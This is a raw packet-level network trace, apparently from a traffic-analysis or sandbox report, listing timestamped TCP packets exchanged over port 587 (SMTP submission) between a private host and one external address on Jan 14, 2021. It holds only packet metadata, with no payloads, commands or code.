Jan 14, 2021 08:02:26.291158915 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.291687965 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.305286884 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.305310965 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.305318117 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.305430889 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.305459976 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.305475950 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.305512905 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.305565119 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.305670023 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.305677891 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.305757046 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.305820942 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.305847883 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.305911064 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.305944920 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.305993080 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.306016922 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.306066036 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.306092024 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.306143045 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.306166887 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.306206942 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.306227922 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.306277990 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.459964037 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.481931925 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.482172966 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.482280016 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.482331038 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.483391047 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.483807087 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.495444059 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.495493889 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.495610952 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.495686054 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.495764971 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.495800972 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.495839119 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.495965958 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.495981932 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.496037960 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.508424997 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.549323082 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.650221109 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.650692940 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.650713921 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.650820971 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.651325941 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.651683092 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.673599958 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.673639059 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.673916101 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.674698114 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.675051928 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.841520071 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.842329025 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.842403889 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.868787050 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.868813992 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.869158983 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:27.035151958 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.035372972 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:27.059372902 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.063361883 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.063709974 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:27.227600098 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.228023052 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.228200912 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:27.253932953 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.255084038 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.255335093 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:27.418167114 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.419126987 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:27.445846081 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.475441933 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.475729942 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:27.609158993 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.609253883 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.609283924 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.609344006 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:27.610119104 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:27.610795975 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:27.666059971 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.667089939 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.667470932 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:27.667511940 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:27.667547941 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:27.667601109 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:27.667651892 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:27.667673111 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:27.667694092 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:27.667717934 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:27.800050020 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.800081015 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.800618887 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.801063061 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.801398993 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:27.857760906 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.857783079 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.857793093 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.876111984 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:27.924350977 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:27.988143921 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:27.991409063 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:28.178587914 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:28.178805113 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:28.178823948 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:28.178941965 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:28.179486036 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:28.179842949 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:28.369726896 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:28.370203972 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:28.370306969 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:28.561914921 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:28.564661980 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:28.755503893 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:28.756741047 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:28.757129908 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:28.947220087 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:28.947802067 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:29.138372898 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:29.138401031 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:29.138576984 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:29.139408112 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:29.139811039 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:29.329750061 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:29.329775095 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:29.329802036 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:29.330229998 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:29.330485106 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:29.520564079 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:29.522188902 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:29.522558928 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:29.712627888 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:29.716371059 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:29.716751099 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:29.906927109 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:29.908174038 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:29.908482075 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:30.098484993 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:30.130110979 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:30.130410910 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:30.320425987 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:30.320993900 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:30.321455956 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:30.321588039 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:30.321696043 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:30.321839094 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:30.366122961 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:30.511473894 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:30.511498928 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:30.511615038 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:30.511646032 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:30.511751890 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:30.512213945 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:30.556211948 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:30.556301117 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:30.702295065 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:30.702893972 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:30.746519089 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:30.748701096 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:30.846645117 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:30.847913980 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:30.893596888 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:30.893860102 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:30.938972950 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:30.939111948 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:30.939346075 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.038084984 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.038701057 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.084052086 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.084088087 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.084104061 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.084754944 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.129542112 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.129576921 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.129591942 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.129672050 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.129759073 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.129820108 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.228884935 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.228923082 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.229126930 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.274930000 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.274957895 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.274976969 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.275118113 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.275162935 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.275163889 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.283989906 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.320420980 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.320451021 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.320785999 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.320853949 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.438359022 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.438388109 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.438409090 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.438566923 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.438617945 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.465241909 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.465275049 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.465307951 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.465456009 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.474164963 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.474199057 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.474293947 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.510967016 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.510994911 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.511004925 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.511100054 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.511161089 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.511228085 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.511244059 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.511286020 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.511365891 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.511384964 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.511441946 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.511451960 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.511502028 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.628825903 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.628856897 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.628873110 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.628945112 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.629004002 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.655652046 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.655680895 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.655726910 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.655745029 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.655745029 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.655802011 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.655817986 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.664449930 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.664474964 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.664531946 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.664588928 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.701368093 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.701416016 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.701502085 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.701507092 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.701565981 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.701576948 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.701589108 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.701637030 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.701792002 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.701811075 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.701894045 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.702054024 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.702115059 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.819120884 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.819152117 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.819256067 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.819314957 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.819390059 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.845882893 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.845915079 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.845947981 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.845963001 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.846008062 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.846065998 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.854691029 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.854729891 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.854834080 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.891752005 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.891778946 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.891866922 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.891921043 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.892011881 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.892026901 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.892083883 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.892108917 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.892326117 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.892395973 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.892436028 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:31.993695021 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:31.994111061 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.009876966 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.009998083 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.036154985 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.036185026 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.036246061 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.036253929 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.036304951 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.036326885 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.044924021 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.044939995 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.045003891 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.045063019 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.081974983 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.082020044 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.082043886 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.082102060 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.082124949 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.082185030 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.082201958 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.082335949 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.082412958 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.082427979 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.082689047 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.082773924 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.184082031 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.186811924 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.187069893 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.200153112 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.200223923 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.200259924 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.200305939 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.226521015 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.226547956 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.226658106 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.226711035 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.235107899 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.235127926 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.235203981 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.235394955 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.272290945 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.272314072 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.272439957 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.272557020 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.272571087 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.272629023 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.272634983 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.272694111 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.272722960 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.272799969 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.272890091 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.272948980 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.272965908 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.272994995 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.273046017 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.273051977 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.273099899 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.273533106 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.273637056 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.377140999 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.378381968 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.390484095 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.390512943 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.390682936 CET	49837	587	192.168.2.3	199.193.7.228
